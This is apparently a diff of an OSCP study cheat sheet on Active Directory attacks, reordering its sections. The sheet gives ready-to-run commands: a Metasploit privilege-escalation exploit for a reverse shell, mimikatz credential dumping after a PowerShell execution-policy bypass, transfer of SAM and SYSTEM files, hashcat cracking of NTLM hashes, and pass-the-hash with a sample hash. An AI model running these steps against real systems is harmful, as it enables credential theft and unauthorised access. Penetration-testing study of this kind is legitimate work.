redcountryroad/OSCP-shortsheet/ActiveDirectory.md

 2. for each vulnerabilities suggested, run metasploit payload to obtain Reverse shell: `use exploit/windows/local/ms10_015_kitrap0d`
 3. repeat thru the listed of suggested exploits and try until success

+## Dump SAM (NTLM) and LSA using mimikatz
+1. needs to be admin to run mimikatz
+2. `powershell -ep bypass`
+3. `import-module .\invoke-mimikatz.ps1`
+4. `Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'`

-# Crack SAM (NTLM hash) and SYSTEM
+## Crack SAM (NTLM hash) and SYSTEM
 1. On Windows, run hfs.exe to transfer SAM and SYSTEM to Kali (drag and drop)
 2. On Kali, `wget http://192.168.1.55/sam` and `wget http://192.168.1.55/system`
 3. Use samdump2 to decrypt SAM. `samdump2 system sam`
 4. Copy and paste the hashes from (3) to notepad: `hashcat -m 1000 -a 3 hashes.txt rockyou.txt`
 5. Note: -m specifies the hash type to decrypt e.g. 1000 = NTLM

-# Dump SAM (NTLM) and LSA using mimikatz
-1. needs to be admin to run mimikatz
-2. `powershell -ep bypass`
-3. `import-module .\invoke-mimikatz.ps1`
-4. `Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'`

-**# 80. pass the hash using mimikatz
+## pass the hash using mimikatz
 1. `powershell -ep bypass`
 2. import-module .\invoke-mimikatz.ps1`
 3. `Invoke-Mimikatz -Command '"sekurlsa::pth /user:stdent5 /domain:pentesting/ntlm:369def79d8372408bf6e93364cc93075 /run:powershell.exe"'`